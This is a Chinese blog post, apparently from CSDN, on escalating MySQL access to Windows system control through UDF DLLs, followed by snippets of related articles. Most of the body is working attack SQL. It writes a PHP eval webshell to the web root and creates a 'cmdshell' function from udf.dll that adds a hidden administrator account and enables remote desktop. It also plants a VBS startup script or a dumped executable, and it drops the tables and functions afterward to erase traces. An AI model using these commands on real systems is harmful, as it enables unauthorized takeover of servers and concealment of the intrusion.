MySQL扩展接口UDF提权

最新推荐文章于 2023-06-24 16:20:19 发布
最新推荐文章于 2023-06-24 16:20:19 发布
阅读量1.5k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuhuaijin/article/details/77373163
版权

1.UDF介绍

udf(user-defined function)是MySQL的一个拓展接口,也称为自定义函数。

2. UDF提权条件

1)目标系统是Windows(win2000,XP,win2003)

2)可以将udf.dll写入到相应目录的权限。(如果Mysql版本大于5.1版本,udf.dll文件必须放置于MySQL安装目录下的lib\plugin文件夹下。如果Mysql版本小于5.1版本,udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32.)

3)已经拥有MySQL的某个用户账户,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MySQL文档原语),一般以root账号为佳,具备root账号所具备的权限的其它账号也可以。

3.提权方法(有webshell的UDF提权、无webshell的UDF提权)

前提:root权限  目的:获取系统权限  总结:UDF提权专用webshell, 导出dll, 再执行命令

1)通过webshell读取数据库配置文件,获取数据库连接用户名密码

2)上传udf.dll

select '<?php eval($_POST['jim'];?>' into outfile 'F:/web/bak.php';  //写入文件

select load_file(木马的十六进制代码) from user into outfile 'D:/web/iis.txt' //导出文件

3)执行SQL

create fucntion cmdshell returns string soname "udf.dll";  //创建cmdshell函数

select cmdshell ('net user aaa 123 /add');  //执行cmd命令

select cmdshell ('net localgroup administrators aaa /add');  

select cmdshell ('regedit /s d:\web\3389.reg');

select cmdshell('netstat -an');

drop function cmdshell;  //删除cmdshell函数,清除痕迹

select @@plugin_dir

select version(); //显示数据库版本

select @@basedir //获取MySQL安装目录  

select user(); //获取当前用户

二、mix.dll提权

1.获取root权限

2.把DLL放到系统目录

create table mix(abc longblob);

insert into mix values(load_file('D:\\web\\udf.dll'));  //读文件

select * from mix into outfile 'C:\\windows\\system32\\udf.dll';  、写文件

3.创建函数,执行系统命令

create function cmdshell returns string soname 'udf.dll';

select cmdshell('net user aaa 123 /add');

select cmdshell('net localgroup administrators aaa /add');

select cmdshell('net user');

4.删除函数,清除痕迹

drop table if exists mix;

三、VBS启动项提权

1.webshell连接数据库

2.执行SQL

create table vbs (cmd text);  //创建表

insert into vbs values ("set cmdshell=createobject ("wscript.shell")");

insert into vbs values ("a=cmdshell.run("cmd.exe /c net user aaa 123 /add",0)");

insert into vbs valuse ("b=cmdshell.run("cmd.exe /c net localgroup administrators aaa /add",0)");

select * from vbs into outfile "c:\\users\\a.vbs";  //导入启动项

drop table vbs;  //删除表

或者

create table class (cmd BLOB);

insert into class values (CONVERT(木马的十六进制,char));

select * from class into dumpfile 'C:\\users\\mm.exe';  

drop table class;







玄瞋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
Hive可扩展接口UDF
windsor575的博客
06-20 1327
Hive 可扩展接口学习笔记Hive提供灵活的接口,以使用户能更灵活地处理数据。可扩展接口分为三种:UDF、UDTF、和UDAFUDFUDF是最常用到的接口,用来处理字段并返回一个单一的值。 接口类型:UDF提供两种接口:简单API org.apache.hadoop.hive.ql.exec.UDFUDF接口可以用来读取并返回初级类型。这里说的初级类型指的是hadoop和hive的可写类型:Tex
Windows提权mysql数据库提权(UDF提权)
mrx56的博客
03-31 3014
可通过sqlmap或者msf获取udf文件。
【数据库提权MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 1718
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
【数据库提权Mysql-UDF 提权
qq_48201589的博客
06-24 270
UDF(user defined function),用户自定义函数。UDF提权是利用数据库将地权限的shell提权到高权限。当我们通过webshell获取到Apache服务器的权限,而获取到的用户只是网络服务权限www或其他普通用户,则我们可以利用mysqlUDF提权获取到管理员权限。
MySQL提权UDF提权(附带大马)
07-25 1625
Mysql提权UDF
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
mysql提权udf
09-20
mysql免杀UDF 提权必不可少神器。必须配备
MYSQL高版本低版本UDF提权工具
06-20
MYSQL高版本低版本UDF提权工具 很好用的UDF提权使用 有两个版本
mysql udf limit_锁定服务UDF接口
weixin_30371285的博客
02-27 125
锁定服务UDF接口本节介绍如何使用锁定服务用户定义功能(UDF)接口。要改为使用C语言接口,请参见“锁定服务C接口”。有关锁定服务接口的一般特征,请参见“锁定服务”。有关用户定义函数的一般信息,请参见“添加用户定义的功能”。安装或卸载UDF锁定接口不需要安装“ Locking Service C接口”中描述的锁定服务例程,因为它们已内置在服务器中。对于映射到对服务例程的调用的用户定义函数(UDF)...
MysqlUDF提权
热门推荐
yy
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
109.网络安全渗透测试—[权限提升篇7]—[Windows Mysql UDF提权]
qwsn
07-05 2536
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)在mysql可以使用udf自定义函数进行提权udf = user defined function 用户自定义函数。(2)对于自定义的函数,在mysql5.1版本以后就需要放在插件插件目录 /lib/plugin ,文件后缀微dll,c语言编写。(3)udf提权的位数,取决于操作系统位数,与mysql位数无关。​ 我们通过文件上传+文件包含获得了一个webshell,但是此时的权限很低,与此同时还获得了靶机MySQL的连接
mysql提权_【原创】MySQL常见提权姿势总结
weixin_39686192的博客
12-05 1054
最近在复习mysql提权,所以正好写篇文章总结一下关于mysql的常见提权姿势相关操作select @@version; 查询数据库版本 select @@basedir; 查询MYSQL安装路径 select @@plugin_dir ; 查看plugin路径 select host, user, password from mysql.user; 查询hash (MySQL <= 5.6...
MySQL UDF 提权
small_cat's home
10-22 1785
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
GBase 8a UDF函数接口
jingjing1068的博客
02-25 439
对每一个想在SQL语句中使用的函数(假设函数名为func),应该定义对应的C(或 C++ ,C++函数声明要加上extern "C ")函数, 该函数满足以下规则: 1、 func()(必需) 主函数。这是计算函数结果的地方,每行调用一次。SQL 类型与C/C++函数返回类型的对应关系如下: SQL 类型 C/C++ 类型 STRING char * INTEGER long long REAL double 2、 func_init()(必需) func()的初始化函数,只在开始调用一次,它可用于: 检查
MYSQL UDF手动提权及自动化工具使用
qq_45373631的博客
11-22 2663
UDF手工提权及自动化工具使用
Mysql_udf提权[超详细]|VulnHub-Raven:2渗透测试
qq_60115503的博客
04-22 2832
Mysql内置函数 Mysql有很多内置函数提供给使用者,包括字符串函数,数值函数,日期和时间函数等,给开发人员和使用者带来了很多方便 UDF介绍 Mysql的内置函数虽热丰富,但毕竟不能满足所有人的需求,有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候,就需要对Mysql进行一些扩展,幸运的是,Mysql给使用者提供了添加新函数的机制,这种使用者自行添加的Mysql函数就称为UDF(User Define Function)UDF机制能够起作用,必须...
MySQL UDF提权
小水池
08-08 9045
0x00 原理 udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。 通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。   0x01 思路   1. 将udf文件上传到指定位置  sqlmap中有现成的udf文件,分为32位和64位...
mysqludf提权
最新发布
10-15
但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值